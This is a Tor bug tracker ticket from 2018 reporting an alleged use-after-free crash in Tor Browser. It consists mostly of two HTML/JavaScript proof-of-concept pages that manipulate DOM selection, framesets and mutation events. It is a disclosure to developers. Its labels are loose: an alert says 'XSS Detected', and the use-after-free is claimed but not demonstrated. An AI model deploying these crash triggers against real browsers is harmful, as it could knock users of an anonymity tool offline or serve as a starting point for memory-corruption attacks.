[tor-bugs] #26705 [Core Tor/Tor]: BUG Report ! Use after Free Vulnerability

Tor Bug Tracker & Wiki blackhole at torproject.org
Mon Jul 9 14:57:21 UTC 2018


#26705: BUG Report ! Use after Free Vulnerability
------------------------------+------------------------------
     Reporter:  t4rkd3vilz    |      Owner:  (none)
         Type:  project       |     Status:  new
     Priority:  Very High     |  Milestone:
    Component:  Core Tor/Tor  |    Version:  Tor: unspecified
     Severity:  Normal        |   Keywords:
Actual Points:                |  Parent ID:
       Points:                |   Reviewer:
      Sponsor:                |
------------------------------+------------------------------
 Hello,

 In Tor Browser, click to open a new tab.

 In the new tab, open HTML with this code:

 <style>
 body { display: table }
 </style>
 <script>
 function freenabo() {
 try { fuzzPriv.forceGC(); } catch(err) { alert('XSS Detected aWEqwq :)');
 }
 }
 function go() {
 var s = document.getSelection();
 window.find("1",true,false,true,false);
 s.modify("extend","forward","line");
 document.body.append(document.createElement("table"));
 freenabo()
 }
 </script>
 <body onload=go()>
 <table>
 <th>t4rkd3vilz</th>
 </table>
 <progress></progress>

 Then open a second tab.

 Code for the second tab:
 <!DOCTYPE html>
 <html>
 <title>veryhandsome jameel naboo</title>
 <body>
 <script>
 function send()
 {
 try { document.body.contentEditable = 'true'; } catch(e){}
 try { var e0 = document.createElement("frameset"); } catch(e){}
 try { document.body.appendChild(e0); } catch(e){}
 try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); }
 catch(e){}
 try {
 e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['border']='-4400000000';}, false); e0.focus();} catch(e){}
 try { e0.setAttribute('iframe'); } catch(e){}
 try { document.body.insertBefore(e0); } catch(e){}
 }
 send();</script></html>

 Result: Tor Browser crashes...


--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/26705>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online